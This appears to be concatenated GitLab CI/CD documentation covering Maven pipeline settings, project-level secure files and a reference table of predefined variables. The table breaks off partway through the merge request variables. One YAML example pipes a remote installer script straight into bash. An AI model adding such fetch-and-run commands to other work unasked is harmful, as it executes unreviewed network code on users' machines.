      it's a shortened version of the Git commit ref, autogenerated as a
      [predefined CI/CD variable](../../variables/predefined_variables.md).
      Any job that runs for the same commit ref reuses the same cache.
    - `paths` are the directories or files to include in the cache. In this example,
      the `.m2/` directory is cached to avoid re-installing dependencies between job runs.
- `variables` defines [CI/CD variables](../../variables/_index.md) that can be used by all jobs:
  - `MAVEN_OPTS` are Maven environment variables needed whenever Maven is executed:
    - `-Dhttps.protocols=TLSv1.2` sets the TLS protocol to version 1.2 for any
      HTTP requests in the pipeline.
    - `-Dmaven.repo.local=$CI_PROJECT_DIR/.m2/repository` sets the location of the local
      Maven repository to the GitLab project directory on the runner, so the job can
      access and modify the repository.
  - `MAVEN_CLI_OPTS` are specific arguments to be added to `mvn` commands:
    - `-DskipTests` skips the `test` stage in the Maven build lifecycle.
- `test-code`, `build-JAR`, and `install-JAR` are the user-defined names for the jobs
  to run in the pipeline:
  - `stage` defines which stage the job runs in. A pipeline contains one or more stages
    and a stage contains one or more jobs. This example has three stages, each with a
    single job.
  - `script` defines the commands to run in that job, similar to `steps` in a `Jenkinsfile`.
    Jobs can run multiple commands in sequence, which run in the image container, but in
    this example the jobs run only one command each.
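The slug behavior behind the cache `key` can be approximated in the shell. This is only a sketch for intuition, based on the documented transformation for `CI_COMMIT_REF_SLUG` (lowercase, characters outside `0-9` and `a-z` replaced with `-`, truncated to 63 bytes, no leading or trailing `-`), not GitLab's exact implementation:

```shell
# Rough approximation of CI_COMMIT_REF_SLUG: lowercase, replace anything
# outside 0-9 and a-z with '-', keep at most 63 characters, trim '-' at the ends.
ref_slug() {
  printf '%s' "$1" \
    | tr '[:upper:]' '[:lower:]' \
    | sed -e 's/[^a-z0-9]/-/g' \
    | cut -c1-63 \
    | sed -e 's/^-*//' -e 's/-*$//'
}

ref_slug "Feature/My_Branch"   # feature-my-branch
```

Two branches whose names slugify identically would therefore share the same cache key.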
---
stage: Software Supply Chain Security
group: Pipeline Security
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
title: Project-level secure files
breadcrumbs:
- doc
- ci
- secure_files
---

{{< details >}}

- Tier: Free, Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

{{< history >}}

- [Generally available](https://gitlab.com/gitlab-org/gitlab/-/issues/350748) and feature flag `ci_secure_files` removed in GitLab 15.7.

{{< /history >}}

This feature is part of [Mobile DevOps](../mobile_devops/_index.md). The feature is still
in development, but you can:

- [Request a feature](https://gitlab.com/gitlab-org/incubation-engineering/mobile-devops/feedback/-/issues/new?issuable_template=feature_request).
- [Report a bug](https://gitlab.com/gitlab-org/incubation-engineering/mobile-devops/feedback/-/issues/new?issuable_template=report_bug).
- [Share feedback](https://gitlab.com/gitlab-org/incubation-engineering/mobile-devops/feedback/-/issues/new?issuable_template=general_feedback).

You can securely store up to 100 files for use in CI/CD pipelines as secure files.
These files are stored securely outside of your project's repository and are not
version controlled. It is safe to store sensitive information in these files.
Secure files support both plain text and binary file types, but must be 5 MB or less.

You can manage secure files in the project settings, or with the
[secure files API](../../api/secure_files.md).

Secure files can be [downloaded and used by CI/CD jobs](#use-secure-files-in-cicd-jobs)
by using the [download-secure-files](https://gitlab.com/gitlab-org/incubation-engineering/mobile-devops/download-secure-files)
tool.

## Add a secure file to a project

To add a secure file to a project:

1. On the left sidebar, select **Search or go to** and find your project.
1. Select **Settings > CI/CD**.
1. Expand the **Secure Files** section.
1. Select **Upload File**.
1. Find the file to upload, select **Open**, and the file upload begins immediately.
   The file shows up in the list when the upload is complete.

## Use secure files in CI/CD jobs

### With the `download-secure-files` tool

To use your secure files in a CI/CD job, you can use the
[`download-secure-files`](https://gitlab.com/gitlab-org/incubation-engineering/mobile-devops/download-secure-files)
tool to download the files in the job. After they are downloaded, you can use them
with your other script commands.

Add a command in the `script` section of your job to download the `download-secure-files`
tool and execute it. The files download into a `.secure_files` directory in the root of
the project. To change the download location for the secure files, set the path in the
`SECURE_FILES_DOWNLOAD_PATH` [CI/CD variable](../variables/_index.md).

For example:

```yaml
test:
  variables:
    SECURE_FILES_DOWNLOAD_PATH: './where/files/should/go/'
  script:
    - curl --silent "https://gitlab.com/gitlab-org/incubation-engineering/mobile-devops/download-secure-files/-/raw/main/installer" | bash
```

{{< alert type="warning" >}}

The content of files loaded with the `download-secure-files` tool is not
[masked](../variables/_index.md#mask-a-cicd-variable) in the job log output. Make sure
to avoid outputting secure file contents in the job log, especially when logging output
that could contain sensitive information.

{{< /alert >}}

### With the `glab` tool

To download one or more secure files with [`glab`](https://gitlab.com/gitlab-org/cli/),
you can use the `cli` Docker image in the CI/CD job.
For example:

```yaml
test:
  image: registry.gitlab.com/gitlab-org/cli:latest
  script:
    - export GITLAB_HOST=$CI_SERVER_URL
    - glab auth login --job-token $CI_JOB_TOKEN --hostname $CI_SERVER_FQDN --api-protocol $CI_SERVER_PROTOCOL
    - glab -R $CI_PROJECT_PATH securefile download $SECURE_FILE_ID --path="where/to/save/file.txt"
```

The `SECURE_FILE_ID` CI/CD variable needs to be passed to the job explicitly, for example
in [CI/CD settings](../variables/_index.md#define-a-cicd-variable-in-the-ui) or when
[running a pipeline manually](../pipelines/_index.md#run-a-pipeline-manually). Every other
variable is a [predefined variable](../variables/predefined_variables.md) that is
automatically available.

Alternatively, instead of using the Docker image, you can
[download the binary](https://gitlab.com/gitlab-org/cli/-/releases) and use it in your
CI/CD job.

## Security details

Project-level secure files are encrypted on upload using the
[Lockbox](https://github.com/ankane/lockbox) Ruby gem by using the
[`Ci::SecureFileUploader`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/app/uploaders/ci/secure_file_uploader.rb)
interface. This interface generates a SHA256 checksum of the source file during upload
that is persisted with the record in the database, so it can be used to verify the
contents of the file when downloaded.

A [unique encryption key](https://gitlab.com/gitlab-org/gitlab/-/blob/master/app/models/ci/secure_file.rb#L27)
is generated for each file when it is created, and persisted in the database. The
encrypted uploaded files are stored in either local storage or object storage, depending
on the [GitLab instance configuration](../../administration/cicd/secure_files.md).

Individual files can be retrieved with the
[secure files download API](../../api/secure_files.md#download-secure-file). Metadata can
be retrieved with the [list](../../api/secure_files.md#list-project-secure-files) or
[show](../../api/secure_files.md#show-secure-file-details) API endpoints.
Files can also be retrieved with the
[`download-secure-files`](https://gitlab.com/gitlab-org/incubation-engineering/mobile-devops/download-secure-files)
tool. This tool automatically verifies the checksum of each file as it is downloaded.

Any project member with at least the Developer role can access project-level secure files.
Interactions with project-level secure files are not included in audit events, but
[issue 117](https://gitlab.com/gitlab-org/incubation-engineering/mobile-devops/readme/-/issues/117)
proposes adding this functionality.
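The checksum verification that `download-secure-files` performs can be sketched in the shell. The file name and contents below are made-up stand-ins; in a real job, the expected SHA256 checksum would come from the secure file's stored metadata rather than being recomputed locally:

```shell
# Simulate a downloaded secure file (stand-in content, not a real keystore).
mkdir -p .secure_files
printf 'keystore-contents' > .secure_files/example.keystore

# Stand-in for the checksum recorded in the secure file's metadata.
expected=$(printf 'keystore-contents' | sha256sum | cut -d' ' -f1)

# Verify the downloaded file matches the recorded checksum.
actual=$(sha256sum .secure_files/example.keystore | cut -d' ' -f1)
if [ "$actual" = "$expected" ]; then
  echo "checksum OK"
else
  echo "checksum mismatch" >&2
  exit 1
fi
```

A mismatch here would indicate the file was corrupted or altered between upload and download.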
---
stage: Verify
group: Pipeline Authoring
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
title: Predefined CI/CD variables reference
breadcrumbs:
- doc
- ci
- variables
---
{{< details >}}

- Tier: Free, Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

Predefined [CI/CD variables](_index.md) are available in every GitLab CI/CD pipeline.

Avoid [overriding](_index.md#use-pipeline-variables) predefined variables, as it can
cause the pipeline to behave unexpectedly.

## Variable availability

Predefined variables become available at three different phases of pipeline execution:

- Pre-pipeline: Pre-pipeline variables are available before the pipeline is created.
  These variables are the only variables that can be used with
  [`include:rules`](../yaml/_index.md#includerules) to control which configuration
  files to use when creating the pipeline.
- Pipeline: Pipeline variables become available when GitLab is creating the pipeline.
  Along with pre-pipeline variables, pipeline variables can be used to configure
  [`rules`](../yaml/_index.md#rules) defined in jobs, to determine which jobs to add
  to the pipeline.
- Job-only: These variables are only made available to each job when a runner picks up
  the job and runs it, and:
  - Can be used in job scripts.
  - Cannot be used with [trigger jobs](../pipelines/downstream_pipelines.md#trigger-a-downstream-pipeline-from-a-job-in-the-gitlab-ciyml-file).
  - Cannot be used with [`workflow`](../yaml/_index.md#workflow), [`include`](../yaml/_index.md#include),
    or [`rules`](../yaml/_index.md#rules).

## Predefined variables

| Variable | Availability | Description |
|----------|--------------|-------------|
| `CHAT_CHANNEL` | Pipeline | The Source chat channel that triggered the [ChatOps](../chatops/_index.md) command. |
| `CHAT_INPUT` | Pipeline | The additional arguments passed with the [ChatOps](../chatops/_index.md) command. |
| `CHAT_USER_ID` | Pipeline | The chat service's user ID of the user who triggered the [ChatOps](../chatops/_index.md) command. |
| `CI` | Pre-pipeline | Available for all jobs executed in CI/CD. `true` when available. |
| `CI_API_V4_URL` | Pre-pipeline | The GitLab API v4 root URL. |
| `CI_API_GRAPHQL_URL` | Pre-pipeline | The GitLab API GraphQL root URL. Introduced in GitLab 15.11. |
| `CI_BUILDS_DIR` | Job-only | The top-level directory where builds are executed. |
| `CI_COMMIT_AUTHOR` | Pre-pipeline | The author of the commit in `Name <email>` format. |
| `CI_COMMIT_BEFORE_SHA` | Pre-pipeline | The previous latest commit present on a branch or tag. Is always `0000000000000000000000000000000000000000` for merge request pipelines, scheduled pipelines, the first commit in pipelines for branches or tags, or when manually running a pipeline. |
| `CI_COMMIT_BRANCH` | Pre-pipeline | The commit branch name. Available in branch pipelines, including pipelines for the default branch. Not available in merge request pipelines or tag pipelines. |
| `CI_COMMIT_DESCRIPTION` | Pre-pipeline | The description of the commit. If the title is shorter than 100 characters, the message without the first line. |
| `CI_COMMIT_MESSAGE` | Pre-pipeline | The full commit message. |
| `CI_COMMIT_REF_NAME` | Pre-pipeline | The branch or tag name for which the project is built. |
| `CI_COMMIT_REF_PROTECTED` | Pre-pipeline | `true` if the job is running for a protected reference, `false` otherwise. |
| `CI_COMMIT_REF_SLUG` | Pre-pipeline | `CI_COMMIT_REF_NAME` in lowercase, shortened to 63 bytes, and with everything except `0-9` and `a-z` replaced with `-`. No leading / trailing `-`. Use in URLs, host names, and domain names. |
| `CI_COMMIT_SHA` | Pre-pipeline | The commit revision the project is built for. |
| `CI_COMMIT_SHORT_SHA` | Pre-pipeline | The first eight characters of `CI_COMMIT_SHA`. |
| `CI_COMMIT_TAG` | Pre-pipeline | The commit tag name. Available only in pipelines for tags. |
| `CI_COMMIT_TAG_MESSAGE` | Pre-pipeline | The commit tag message. Available only in pipelines for tags. Introduced in GitLab 15.5. |
| `CI_COMMIT_TIMESTAMP` | Pre-pipeline | The timestamp of the commit in the [ISO 8601](https://www.rfc-editor.org/rfc/rfc3339#appendix-A) format. For example, `2022-01-31T16:47:55Z`. [UTC by default](../../administration/timezone.md). |
| `CI_COMMIT_TITLE` | Pre-pipeline | The title of the commit. The full first line of the message. |
| `CI_CONCURRENT_ID` | Job-only | The unique ID of build execution in a single executor. |
| `CI_CONCURRENT_PROJECT_ID` | Job-only | The unique ID of build execution in a single executor and project. |
| `CI_CONFIG_PATH` | Pre-pipeline | The path to the CI/CD configuration file. Defaults to `.gitlab-ci.yml`. |
| `CI_DEBUG_TRACE` | Pipeline | `true` if [debug logging (tracing)](variables_troubleshooting.md#enable-debug-logging) is enabled. |
| `CI_DEBUG_SERVICES` | Pipeline | `true` if [service container logging](../services/_index.md#capturing-service-container-logs) is enabled. Introduced in GitLab 15.7. Requires GitLab Runner 15.7. |
| `CI_DEFAULT_BRANCH` | Pre-pipeline | The name of the project's default branch. |
| `CI_DEFAULT_BRANCH_SLUG` | Pre-pipeline | `CI_DEFAULT_BRANCH` in lowercase, shortened to 63 bytes, and with everything except `0-9` and `a-z` replaced with `-`. No leading / trailing `-`. Use in URLs, host names, and domain names. |
| `CI_DEPENDENCY_PROXY_DIRECT_GROUP_IMAGE_PREFIX` | Pre-pipeline | The direct group image prefix for pulling images through the Dependency Proxy. |
| `CI_DEPENDENCY_PROXY_GROUP_IMAGE_PREFIX` | Pre-pipeline | The top-level group image prefix for pulling images through the Dependency Proxy. |
| `CI_DEPENDENCY_PROXY_PASSWORD` | Pipeline | The password to pull images through the Dependency Proxy. |
| `CI_DEPENDENCY_PROXY_SERVER` | Pre-pipeline | The server for logging in to the Dependency Proxy. This variable is equivalent to `$CI_SERVER_HOST:$CI_SERVER_PORT`. |
| `CI_DEPENDENCY_PROXY_USER` | Pipeline | The username to pull images through the Dependency Proxy. |
| `CI_DEPLOY_FREEZE` | Pre-pipeline | Only available if the pipeline runs during a [deploy freeze window](../../user/project/releases/_index.md#prevent-unintentional-releases-by-setting-a-deploy-freeze). `true` when available. |
| `CI_DEPLOY_PASSWORD` | Job-only | The authentication password of the [GitLab Deploy Token](../../user/project/deploy_tokens/_index.md#gitlab-deploy-token), if the project has one. |
| `CI_DEPLOY_USER` | Job-only | The authentication username of the [GitLab Deploy Token](../../user/project/deploy_tokens/_index.md#gitlab-deploy-token), if the project has one. |
| `CI_DISPOSABLE_ENVIRONMENT` | Pipeline | Only available if the job is executed in a disposable environment (something that is created only for this job and disposed of/destroyed after the execution - all executors except `shell` and `ssh`). `true` when available. |
| `CI_ENVIRONMENT_ID` | Pipeline | The ID of the environment for this job. Available if [`environment:name`](../yaml/_index.md#environmentname) is set. |
| `CI_ENVIRONMENT_NAME` | Pipeline | The name of the environment for this job. Available if [`environment:name`](../yaml/_index.md#environmentname) is set. |
| `CI_ENVIRONMENT_SLUG` | Pipeline | The simplified version of the environment name, suitable for inclusion in DNS, URLs, Kubernetes labels, and so on. Available if [`environment:name`](../yaml/_index.md#environmentname) is set. The slug is [truncated to 24 characters](https://gitlab.com/gitlab-org/gitlab/-/issues/20941). A random suffix is automatically added to [uppercase environment names](https://gitlab.com/gitlab-org/gitlab/-/issues/415526). |
| `CI_ENVIRONMENT_URL` | Pipeline | The URL of the environment for this job. Available if [`environment:url`](../yaml/_index.md#environmenturl) is set. |
| `CI_ENVIRONMENT_ACTION` | Pipeline | The action annotation specified for this job's environment. Available if [`environment:action`](../yaml/_index.md#environmentaction) is set. Can be `start`, `prepare`, or `stop`. |
| | `CI_ENVIRONMENT_TIER` | Pipeline | The [deployment tier of the environment](../environments/_index.md#deployment-tier-of-environments) for this job. | | `CI_GITLAB_FIPS_MODE` | Pre-pipeline | Only available if [FIPS mode](../../development/fips_gitlab.md) is enabled in the GitLab instance. `true` when available. | | `CI_HAS_OPEN_REQUIREMENTS` | Pipeline | Only available if the pipeline's project has an open [requirement](../../user/project/requirements/_index.md). `true` when available. | | `CI_JOB_GROUP_NAME` | Pipeline | The shared name of a group of jobs, when using either [`parallel`](../yaml/_index.md#parallel) or [manually grouped jobs](../jobs/_index.md#group-similar-jobs-together-in-pipeline-views). For example, if the job name is `rspec:test: [ruby, ubuntu]`, the `CI_JOB_GROUP_NAME` is `rspec:test`. It is the same as `CI_JOB_NAME` otherwise. Introduced in GitLab 17.10. | | `CI_JOB_ID` | Job-only | The internal ID of the job, unique across all jobs in the GitLab instance. | | `CI_JOB_IMAGE` | Pipeline | The name of the Docker image running the job. | | `CI_JOB_MANUAL` | Pipeline | Only available if the job was started manually. `true` when available. | | `CI_JOB_NAME` | Pipeline | The name of the job. | | `CI_JOB_NAME_SLUG` | Pipeline | `CI_JOB_NAME` in lowercase, shortened to 63 bytes, and with everything except `0-9` and `a-z` replaced with `-`. No leading / trailing `-`. Use in paths. Introduced in GitLab 15.4. | | `CI_JOB_STAGE` | Pipeline | The name of the job's stage. | | `CI_JOB_STATUS` | Job-only | The status of the job as each runner stage is executed. Use with [`after_script`](../yaml/_index.md#after_script). Can be `success`, `failed`, or `canceled`. | | `CI_JOB_TIMEOUT` | Job-only | The job timeout, in seconds. Introduced in GitLab 15.7. Requires GitLab Runner 15.7. | | `CI_JOB_TOKEN` | Job-only | A token to authenticate with [certain API endpoints](../jobs/ci_job_token.md). The token is valid as long as the job is running. 
| | `CI_JOB_URL` | Job-only | The job details URL. | | `CI_JOB_STARTED_AT` | Job-only | The date and time when a job started, in [ISO 8601](https://www.rfc-editor.org/rfc/rfc3339#appendix-A) format. For example, `2022-01-31T16:47:55Z`. [UTC by default](../../administration/timezone.md). | | `CI_KUBERNETES_ACTIVE` | Pre-pipeline | Only available if the pipeline has a Kubernetes cluster available for deployments. `true` when available. | | `CI_NODE_INDEX` | Pipeline | The index of the job in the job set. Only available if the job uses [`parallel`](../yaml/_index.md#parallel). | | `CI_NODE_TOTAL` | Pipeline | The total number of instances of this job running in parallel. Set to `1` if the job does not use [`parallel`](../yaml/_index.md#parallel). | | `CI_OPEN_MERGE_REQUESTS` | Pre-pipeline | A comma-separated list of up to four merge requests that use the current branch and project as the merge request source. Only available in branch and merge request pipelines if the branch has an associated merge request. For example, `gitlab-org/gitlab!333,gitlab-org/gitlab-foss!11`. | | `CI_PAGES_DOMAIN` | Pre-pipeline | The instance's domain that hosts GitLab Pages, not including the namespace subdomain. To use the full hostname, use `CI_PAGES_HOSTNAME` instead. | | `CI_PAGES_HOSTNAME` | Job-only | The full hostname of the Pages deployment. | | `CI_PAGES_URL` | Job-only | The URL for a GitLab Pages site. Always a subdomain of `CI_PAGES_DOMAIN`. In GitLab 17.9 and later, the value includes the `path_prefix` when one is specified. | | `CI_PIPELINE_ID` | Job-only | The instance-level ID of the current pipeline. This ID is unique across all projects on the GitLab instance. | | `CI_PIPELINE_IID` | Pipeline | The project-level IID (internal ID) of the current pipeline. This ID is unique only in the current project. | | `CI_PIPELINE_SOURCE` | Pre-pipeline | How the pipeline was triggered. 
The value can be one of the [pipeline sources](../jobs/job_rules.md#ci_pipeline_source-predefined-variable). | | `CI_PIPELINE_TRIGGERED` | Pipeline | `true` if the job was [triggered](../triggers/_index.md). | | `CI_PIPELINE_URL` | Job-only | The URL for the pipeline details. | | `CI_PIPELINE_CREATED_AT` | Job-only | The date and time when the pipeline was created, in [ISO 8601](https://www.rfc-editor.org/rfc/rfc3339#appendix-A) format. For example, `2022-01-31T16:47:55Z`. [UTC by default](../../administration/timezone.md). | | `CI_PIPELINE_NAME` | Pre-pipeline | The pipeline name defined in [`workflow:name`](../yaml/_index.md#workflowname). Introduced in GitLab 16.3. | | `CI_PIPELINE_SCHEDULE_DESCRIPTION` | Pre-pipeline | The description of the pipeline schedule. Only available in scheduled pipelines. Introduced in GitLab 17.8. | | `CI_PROJECT_DIR` | Job-only | The full path the repository is cloned to, and where the job runs from. If the GitLab Runner `builds_dir` parameter is set, this variable is set relative to the value of `builds_dir`. For more information, see the [Advanced GitLab Runner configuration](https://docs.gitlab.com/runner/configuration/advanced-configuration.html#the-runners-section). | | `CI_PROJECT_ID` | Pre-pipeline | The ID of the current project. This ID is unique across all projects on the GitLab instance. | | `CI_PROJECT_NAME` | Pre-pipeline | The name of the directory for the project. For example, if the project URL is `gitlab.example.com/group-name/project-1`, `CI_PROJECT_NAME` is `project-1`. | | `CI_PROJECT_NAMESPACE` | Pre-pipeline | The project namespace (username or group name) of the job. | | `CI_PROJECT_NAMESPACE_ID` | Pre-pipeline | The project namespace ID of the job. Introduced in GitLab 15.7. | | `CI_PROJECT_NAMESPACE_SLUG` | Pre-pipeline | `$CI_PROJECT_NAMESPACE` in lowercase with characters that are not `a-z` or `0-9` replaced with `-` and shortened to 63 bytes. 
| | `CI_PROJECT_PATH_SLUG` | Pre-pipeline | `$CI_PROJECT_PATH` in lowercase with characters that are not `a-z` or `0-9` replaced with `-` and shortened to 63 bytes. Use in URLs and domain names. | | `CI_PROJECT_PATH` | Pre-pipeline | The project namespace with the project name included. | | `CI_PROJECT_REPOSITORY_LANGUAGES` | Pre-pipeline | A comma-separated, lowercase list of the languages used in the repository. For example `ruby,javascript,html,css`. The maximum number of languages is limited to 5. An issue [proposes to increase the limit](https://gitlab.com/gitlab-org/gitlab/-/issues/368925). | | `CI_PROJECT_ROOT_NAMESPACE` | Pre-pipeline | The root project namespace (username or group name) of the job. For example, if `CI_PROJECT_NAMESPACE` is `root-group/child-group/grandchild-group`, `CI_PROJECT_ROOT_NAMESPACE` is `root-group`. | | `CI_PROJECT_TITLE` | Pre-pipeline | The human-readable project name as displayed in the GitLab web interface. | | `CI_PROJECT_DESCRIPTION` | Pre-pipeline | The project description as displayed in the GitLab web interface. Introduced in GitLab 15.1. | | `CI_PROJECT_TOPICS` | Pre-pipeline | A comma-separated, lowercase list of [topics](../../user/project/project_topics.md) (limited to the first 20) assigned to the project. Introduced in GitLab 18.3. | | `CI_PROJECT_URL` | Pre-pipeline | The HTTP(S) address of the project. | | `CI_PROJECT_VISIBILITY` | Pre-pipeline | The project visibility. Can be `internal`, `private`, or `public`. | | `CI_PROJECT_CLASSIFICATION_LABEL` | Pre-pipeline | The project [external authorization classification label](../../administration/settings/external_authorization.md). | | `CI_REGISTRY` | Pre-pipeline | Address of the [container registry](../../user/packages/container_registry/_index.md) server, formatted as `<host>[:<port>]`. For example: `registry.gitlab.example.com`. Only available if the container registry is enabled for the GitLab instance. 
| | `CI_REGISTRY_IMAGE` | Pre-pipeline | Base address for the container registry to push, pull, or tag the project's images, formatted as `<host>[:<port>]/<project_full_path>`. For example: `registry.gitlab.example.com/my_group/my_project`. Image names must follow the [container registry naming convention](../../user/packages/container_registry/_index.md#naming-convention-for-your-container-images). Only available if the container registry is enabled for the project. | | `CI_REGISTRY_PASSWORD` | Job-only | The password to push containers to the GitLab project's container registry. Only available if the container registry is enabled for the project. This password value is the same as the `CI_JOB_TOKEN` and is valid only as long as the job is running. Use the `CI_DEPLOY_PASSWORD` for long-lived access to the registry. | | `CI_REGISTRY_USER` | Job-only | The username to push containers to the project's GitLab container registry. Only available if the container registry is enabled for the project. | | `CI_RELEASE_DESCRIPTION` | Pipeline | The description of the release. Available only on pipelines for tags. Description length is limited to the first 1024 characters. Introduced in GitLab 15.5. | | `CI_REPOSITORY_URL` | Job-only | The full path to clone the repository over HTTP with a [CI/CD job token](../jobs/ci_job_token.md), in the format `https://gitlab-ci-token:$CI_JOB_TOKEN@gitlab.example.com/my-group/my-project.git`. | | `CI_RUNNER_DESCRIPTION` | Job-only | The description of the runner. | | `CI_RUNNER_EXECUTABLE_ARCH` | Job-only | The OS/architecture of the GitLab Runner executable. Might not be the same as the environment of the executor. | | `CI_RUNNER_ID` | Job-only | The unique ID of the runner being used. | | `CI_RUNNER_REVISION` | Job-only | The revision of the runner running the job. | | `CI_RUNNER_SHORT_TOKEN` | Job-only | The runner's unique ID, used to authenticate new job requests. The token contains a prefix, and the first 17 characters are used. 
| | `CI_RUNNER_TAGS` | Job-only | A JSON array of runner tags. For example `["tag_1", "tag_2"]`. | | `CI_RUNNER_VERSION` | Job-only | The version of the GitLab Runner running the job. | | `CI_SERVER_FQDN` | Pre-pipeline | The fully qualified domain name (FQDN) of the instance. For example `gitlab.example.com:8080`. Introduced in GitLab 16.10. | | `CI_SERVER_HOST` | Pre-pipeline | The host of the GitLab instance URL, without protocol or port. For example `gitlab.example.com`. | | `CI_SERVER_NAME` | Pre-pipeline | The name of the CI/CD server that coordinates jobs. | | `CI_SERVER_PORT` | Pre-pipeline | The port of the GitLab instance URL, without host or protocol. For example `8080`. | | `CI_SERVER_PROTOCOL` | Pre-pipeline | The protocol of the GitLab instance URL, without host or port. For example `https`. | | `CI_SERVER_SHELL_SSH_HOST` | Pre-pipeline | The SSH host of the GitLab instance, used for access to Git repositories through SSH. For example `gitlab.com`. Introduced in GitLab 15.11. | | `CI_SERVER_SHELL_SSH_PORT` | Pre-pipeline | The SSH port of the GitLab instance, used for access to Git repositories through SSH. For example `22`. Introduced in GitLab 15.11. | | `CI_SERVER_REVISION` | Pre-pipeline | The GitLab revision that schedules jobs. | | `CI_SERVER_TLS_CA_FILE` | Pipeline | File containing the TLS CA certificate to verify the GitLab server when `tls-ca-file` is set in [runner settings](https://docs.gitlab.com/runner/configuration/advanced-configuration.html#the-runners-section). | | `CI_SERVER_TLS_CERT_FILE` | Pipeline | File containing the TLS certificate to verify the GitLab server when `tls-cert-file` is set in [runner settings](https://docs.gitlab.com/runner/configuration/advanced-configuration.html#the-runners-section). | | `CI_SERVER_TLS_KEY_FILE` | Pipeline | File containing the TLS key to verify the GitLab server when `tls-key-file` is set in [runner settings](https://docs.gitlab.com/runner/configuration/advanced-configuration.html#the-runners-section). 
| | `CI_SERVER_URL` | Pre-pipeline | The base URL of the GitLab instance, including protocol and port. For example `https://gitlab.example.com:8080`. | | `CI_SERVER_VERSION_MAJOR` | Pre-pipeline | The major version of the GitLab instance. For example, if the GitLab version is `17.2.1`, the `CI_SERVER_VERSION_MAJOR` is `17`. | | `CI_SERVER_VERSION_MINOR` | Pre-pipeline | The minor version of the GitLab instance. For example, if the GitLab version is `17.2.1`, the `CI_SERVER_VERSION_MINOR` is `2`. | | `CI_SERVER_VERSION_PATCH` | Pre-pipeline | The patch version of the GitLab instance. For example, if the GitLab version is `17.2.1`, the `CI_SERVER_VERSION_PATCH` is `1`. | | `CI_SERVER_VERSION` | Pre-pipeline | The full version of the GitLab instance. | | `CI_SERVER` | Job-only | Available for all jobs executed in CI/CD. `yes` when available. | | `CI_SHARED_ENVIRONMENT` | Pipeline | Only available if the job is executed in a shared environment (something that is persisted across CI/CD invocations, like the `shell` or `ssh` executor). `true` when available. | | `CI_TEMPLATE_REGISTRY_HOST` | Pre-pipeline | The host of the registry used by CI/CD templates. Defaults to `registry.gitlab.com`. Introduced in GitLab 15.3. | | `CI_TRIGGER_SHORT_TOKEN` | Job-only | First 4 characters of the [trigger token](../triggers/_index.md#create-a-pipeline-trigger-token) of the current job. Only available if the pipeline was [triggered with a trigger token](../triggers/_index.md). For example, for a trigger token of `glptt-1234567890abcdefghij`, `CI_TRIGGER_SHORT_TOKEN` would be `1234`. Introduced in GitLab 17.0. <!-- gitleaks:allow --> | | `GITLAB_CI` | Pre-pipeline | Available for all jobs executed in CI/CD. `true` when available. | | `GITLAB_FEATURES` | Pre-pipeline | The comma-separated list of licensed features available for the GitLab instance and license. | | `GITLAB_USER_EMAIL` | Pipeline | The email of the user who started the pipeline, unless the job is a manual job. 
In manual jobs, the value is the email of the user who started the job. | | `GITLAB_USER_ID` | Pipeline | The numeric ID of the user who started the pipeline, unless the job is a manual job. In manual jobs, the value is the ID of the user who started the job. | | `GITLAB_USER_LOGIN` | Pipeline | The unique username of the user who started the pipeline, unless the job is a manual job. In manual jobs, the value is the username of the user who started the job. | | `GITLAB_USER_NAME` | Pipeline | The display name (user-defined **Full name** in the profile settings) of the user who started the pipeline, unless the job is a manual job. In manual jobs, the value is the name of the user who started the job. | | `KUBECONFIG` | Pipeline | The path to the `kubeconfig` file with contexts for every shared agent connection. Only available when a [GitLab agent for Kubernetes is authorized to access the project](../../user/clusters/agent/ci_cd_workflow.md#authorize-agent-access). | | `TRIGGER_PAYLOAD` | Pipeline | The webhook payload. Only available when a pipeline is [triggered with a webhook](../triggers/_index.md#access-webhook-payload). | ## Predefined variables for merge request pipelines These variables are available before GitLab creates the pipeline (Pre-pipeline). These variables can be used with [`include:rules`](../yaml/includes.md#use-rules-with-include) and as environment variables in jobs. The pipeline must be a [merge request pipeline](../pipelines/merge_request_pipelines.md), and the merge request must be open. | Variable | Description | |---------------------------------------------|-------------| | `CI_MERGE_REQUEST_APPROVED` | Approval status of the merge request. `true` when [merge request approvals](../../user/project/merge_requests/approvals/_index.md) is available and the merge request has been approved. | | `CI_MERGE_REQUEST_ASSIGNEES` | Comma-separated list of usernames of assignees for the merge request. 
Only available if the merge request has at least one assignee. | | `CI_MERGE_REQUEST_DIFF_BASE_SHA` | The base SHA of the merge request diff. | | `CI_MERGE_REQUEST_DIFF_ID` | The version of the merge request diff. | | `CI_MERGE_REQUEST_EVENT_TYPE` | The event type of the merge request. Can be `detached`, `merged_result` or `merge_train`. | | `CI_MERGE_REQUEST_DESCRIPTION` | The description of the merge request. If the description is more than 2700 characters long, only the first 2700 characters are stored in the variable. Introduced in GitLab 16.7. | | `CI_MERGE_REQUEST_DESCRIPTION_IS_TRUNCATED` | `true` if `CI_MERGE_REQUEST_DESCRIPTION` is truncated down to 2700 characters because the description of the merge request is too long, otherwise `false`. Introduced in GitLab 16.8. | | `CI_MERGE_REQUEST_ID` | The instance-level ID of the merge request. The ID is unique across all projects on the GitLab instance. | | `CI_MERGE_REQUEST_IID` | The project-level IID (internal ID) of the merge request. This ID is unique for the current project, and is the number used in the merge request URL, page title, and other visible locations. | | `CI_MERGE_REQUEST_LABELS` | Comma-separated label names of the merge request. Only available if the merge request has at least one label. | | `CI_MERGE_REQUEST_MILESTONE` | The milestone title of the merge request. Only available if the merge request has a milestone set. | | `CI_MERGE_REQUEST_PROJECT_ID` | The ID of the project of the merge request. | | `CI_MERGE_REQUEST_PROJECT_PATH` | The path of the project of the merge request. For example `namespace/awesome-project`. | | `CI_MERGE_REQUEST_PROJECT_URL` | The URL of the project of the merge request. For example, `http://192.168.10.15:3000/namespace/awesome-project`. | | `CI_MERGE_REQUEST_REF_PATH` | The ref path of the merge request. For example, `refs/merge-requests/1/head`. | | `CI_MERGE_REQUEST_SOURCE_BRANCH_NAME` | The source branch name of the merge request. 
